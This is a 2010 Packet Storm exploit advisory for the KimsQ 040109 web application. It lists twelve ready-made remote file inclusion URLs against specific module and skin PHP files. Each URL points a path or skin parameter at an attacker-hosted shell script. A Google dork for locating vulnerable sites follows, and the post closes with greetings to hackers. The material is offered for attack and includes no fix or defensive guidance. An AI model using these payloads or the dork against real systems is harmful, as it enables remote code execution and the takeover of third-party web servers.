KimsQ 040109 Remote File Inclusion

2010-03-31T00:00:00
ID PACKETSTORM:87837
Type packetstorm
Reporter mat
Modified 2010-03-31T00:00:00

Description

                                        
                                            ` \\\|///  
\\ - - //  
( @ @ )  
----oOOo--(_)-oOOo--------------------------------------------------  
KimsQ 040109 Multiple Remote File Include Vulnerability  
Script: http://kimsq.googlecode.com/files/kimsq_v040109.zip  
Author: mat  
Mail: rahmat_punk@hotmail.com  
---------------Ooooo------------------------------------------------  
( )  
ooooO ) /  
( ) (_/  
\ (  
\_)  
  
//------------------------------------------------------------------+  
  
http://[target]/[path]/_sys/_ext/module/chat/default/q/user.php?path[home]=http://[shellscript]  
http://[target]/[path]/_sys/_ext/module/contentsbox/default/admin/config.php?path[home]=http://[shellscript]  
http://[target]/[path]/_sys/_ext/module/counter/default/admin/referer.php?path[module]=http://[shellscript]  
http://[target]/[path]/_sys/_ext/module/mbrinfo/default/q/info.php?path[home]=http://[shellscript]  
http://[target]/[path]/_sys/_ext/module/mbrinfo/default/q/log.php?path[module]=http://[shellscript]  
http://[target]/[path]/_sys/_ext/module/minibox/default/q/q.gallery.php?path[module]=http://[shellscript]  
http://[target]/[path]/_sys/_ext/module/minibox/default/q/q.profile.php?path[home]=http://[shellscript]  
http://[target]/[path]/_sys/_ext/module/survey/default/_admin.php?path[module]=http://[shellscript]  
http://[target]/[path]/_sys/_ext/skin/_skin/default_blog/comment.php?bbs[skin]=http://[shellscript]  
http://[target]/[path]/_sys/_ext/skin/_skin/default_board/comment.php?bbs[skin]=http://[shellscript]  
http://[target]/[path]/_sys/_ext/skin/_skin/default_gallery/comment.php?bbs[skin]=http://[shellscript]  
http://[target]/[path]/_sys/_ext/skin/_skin/default_webzine/comment.php?bbs[skin]=http://[shellscript]  
  
//------------------------------------------------------------------+  
  
Google Dork: "kims Q - Administrator Login Mode"  
  
Greetings: All Hackerz  
`